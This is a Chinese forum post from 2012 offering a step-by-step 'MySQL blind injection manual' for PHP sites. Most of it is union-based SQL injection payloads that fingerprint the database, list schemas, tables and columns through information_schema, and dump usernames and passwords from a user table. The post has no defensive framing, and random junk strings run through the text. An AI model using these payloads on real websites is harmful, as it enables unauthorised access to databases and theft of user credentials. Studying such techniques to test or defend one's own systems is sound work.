找回密码
 立即注册
查看: 3012|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
# o# {" Y) G* Y  G$ D! p6 S
教程内容:Mysql 5+php 注入
; Y9 G3 h1 x" Z% s  n2 d) ^, }1 x( a, t
5 x; Y1 a7 G/ T4 [7 m% m

" r- J: [$ ~* Q一.查看MYSQL基本信息(库名,版本,用户)
8 d# J- h4 N" N4 W0 C0 Q
. B0 ?7 R7 v! s2 ]4 `% Z  W) ~" s- tand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*  ^4 x2 d$ C/ {
& g) n1 k# g1 z
二.查数据库3 ]% y2 v; J$ {$ K( }3 r
. t, }. l5 A) n3 C8 S+ X& y
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
3 O$ h/ c7 W9 u: h& }# plimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。. v( O2 T+ o: \/ l* E  {
8 R- l7 Z+ ~1 z( @0 ?
三.暴表! o% T; _3 f5 a

# t& U  S/ A7 W6 |3 D9 d, aand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*7 e# Q" Z  Z$ Q# t

7 [: c; M2 P- w' Olimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
# q% W) }& x. l+ N% I( U. u' j2 V6 n$ R0 A# I- p
四.暴字段6 `! n# y/ y9 |4 M4 i

+ @3 ?/ x; P8 }" a6 I8 h2 Dand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
8 A* h, M& _, g, i' y* {0 P6 E  ]3 [  q! H' e2 {
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。2 u. Q; K- E' D, F! `; r, ^2 n  a
( f$ a0 I: i9 [& v# P
五.暴数据
5 @5 z' ^$ B6 m
& L' _) f) \8 Vand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
! t. k& S; v0 p
# `; X! E/ o; x0 Y( T7 `% T0 H& b
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。* o6 n8 ^: B7 f# O6 K" N$ j# [4 h* z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表